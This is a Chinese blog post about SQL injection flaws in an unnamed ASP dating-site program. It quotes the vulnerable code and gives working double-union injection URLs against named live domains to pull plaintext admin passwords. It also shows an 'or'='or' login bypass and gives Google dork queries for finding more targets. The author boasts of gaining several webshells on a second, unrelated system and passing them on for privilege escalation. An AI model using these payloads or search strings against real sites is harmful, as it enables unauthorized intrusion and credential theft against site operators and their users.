某交友网站的注入漏洞

2010, April 7, 10:02 PM. 漏洞分析
Submitted by admin
某交友网站的注入漏洞。我也不知道是那套程序。居然没版权。肯定是山寨版的,因为代码写的很烂。
先说一个sql注入漏洞。
在party_discuss_list.asp页面,看此处代码:
rs8=server.CreateObject ("ADODB.recordset")
sql="select * from party_discuss where id="&Request("id")
sql=sql&" order by time desc"
rs8.Open sql,conn1,3
没过滤吧,但是在测试时,居然不能注入,工具这时候是无能的,但人是活的,关键是多了句order by time desc多了这句工具就无法判断了注入点了。不过这个也好办,用2次union就可解决。注入语句:
http://www.sdqnw.cn/friend/love/party/party_discuss_list.asp?id=33 and 1=2 union select 1,2,3,4,5,6 from party_discuss union select 1,2,3,passwd,5,admin_id from admin

http://www.xicv.com/love/love/party/party_discuss_list.asp?id=1 and 1=2 union select 1,2,3,4,5,6 from party_discuss union select 1,2,3,passwd,5,admin_id from admin
其中密码是明文。
二,后台登陆验证的缺陷。在after_login.asp页面是这么判断帐号和密码的:
admin_id=request("admin_id") //这里居然不过率单引号
passwd=replace(trim(request("passwd")),"'","")

Set conn = Server.CreateObject("ADODB.Connection")
DBPath = Server.MapPath("../db/sjxffriend.asa")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
Set rs_admin = Server.CreateObject("ADODB.Recordset")
sql="select * from admin where admin_id like '" & admin_id & "' and passwd like '" & passwd & "'"
rs_admin.open sql,conn,3,2

呵呵,看到怎么办了吧,用'or'='or' 就行。密码随便填。
还有cookies注入就不说了。
Goole:inurl:party/party_discuss_list.asp 不想搞密码了直接进后台也行。
后台地址:admin/login.htm

附:在挖这个洞时一不小心挖到了另外一个企业网站系统的洞,我也没下源码看。
Google:格式+86-0769-3301739 后台地址:manage/login.asp 用万能密码登陆。 不一会儿五六个shell了,交给enterer去提权了,我也该吃饭了。
Tags: 注入

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):